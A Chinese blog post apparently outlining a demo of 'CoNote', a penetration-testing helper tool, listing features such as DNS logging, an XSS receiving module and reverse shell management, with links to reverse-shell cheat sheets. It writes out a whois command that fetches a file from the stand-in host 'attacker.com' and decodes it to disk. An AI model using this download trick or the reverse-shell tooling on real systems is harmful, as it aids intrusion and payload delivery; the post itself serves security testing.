『CoNote 安全测试辅助工具』演示
Contents
『CoNote 安全测试辅助工具』演示
原文信息
@phithon
演示信息
https://weibo.com/tv/v/GyBp3tEZp?fid=1034:4282468933551587
Demo 视频
https://v.youku.com/v_show/id_XMzgxNzUwMDQzNg==.html
功能
1 HTTP log
2 DNS log
3 【*】 基于 HTTP 的文件传输
4 文件管理 (自定义 content-type)
5 通配 HTTPS 证书支持
6 构造 POC
7 添加 Markdown 文档 / 代码高亮
8 短域名生成 mhz.pw
9 XSS 模块 / XSS 收信 / 自定义 JS 模块
10 沙盒模块 / PHP / 随时测试 PHP 代码
11 匿名邮箱
12 远程终端 / reverse shell / 反弹 shell
基于 HTTP 等协议的文件传输
使用 whois 从远程主机下载文件
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT <example.com> | base64 -d > "$LFILE"
Reverse Shell 管理
反弹 shell 管理
Reverse Shell Cheat Sheet
Linux后门之道——NC用法别有洞天
http://www.freebuf.com/articles/system/10632.html
Unix系统NC反弹shell的方法
http://www.91ri.org/9615.html
Reverse Shell as a Service
Reverse Shell as a Service @童话
https://github.com/omg2hei/ReShellAAS
批量反弹 shell 管理工具 @wangyihang
https://github.com/WangYihang/Reverse-Shell-Manager
Gatling @观星
关于 DNS 的部分
一份详细的 DNS 协议说明(2018)
https://powerdns.org/hello-dns/
CoNote 中很多模块用到了 DNS 服务器,比如 DNS 日志、DNS Rebinding,其中我用 Python 的 dnslib 库运行了一个简单的 DNS 服务器。实现的过程中,涉及到 A、AAAA、CNAME、MX、NS 等记录,还有泛解析等等细节,都十分有趣。
大家可以阅读下上面这篇文档,了解一下传统 DNS,和近些年提出的 DNSSEC 等新的技术。
@phithon
Leave a Reply